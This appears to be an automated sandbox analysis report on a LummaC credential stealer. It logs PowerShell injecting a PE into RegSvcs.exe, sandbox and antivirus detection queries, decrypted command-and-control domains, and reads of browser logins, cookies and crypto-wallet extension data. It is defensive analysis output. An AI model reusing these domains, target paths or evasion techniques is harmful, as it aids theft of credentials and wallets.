Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3865			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3420			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.2414733395.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2414733395.0000000001427000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004402D0 LdrInitializeThunk,

3_2_004402D0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: buynostopliik.shop

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11AD008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.2415764564.0000000001487000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: RegSvcs.exe, 00000003.00000002.2417423666.00000000038F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegSvcs.exe, 00000003.00000002.2414733395.00000000013F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegSvcs.exe, 00000003.00000002.2414733395.00000000013F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000000.00000002.2313902099.00007FFD342D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
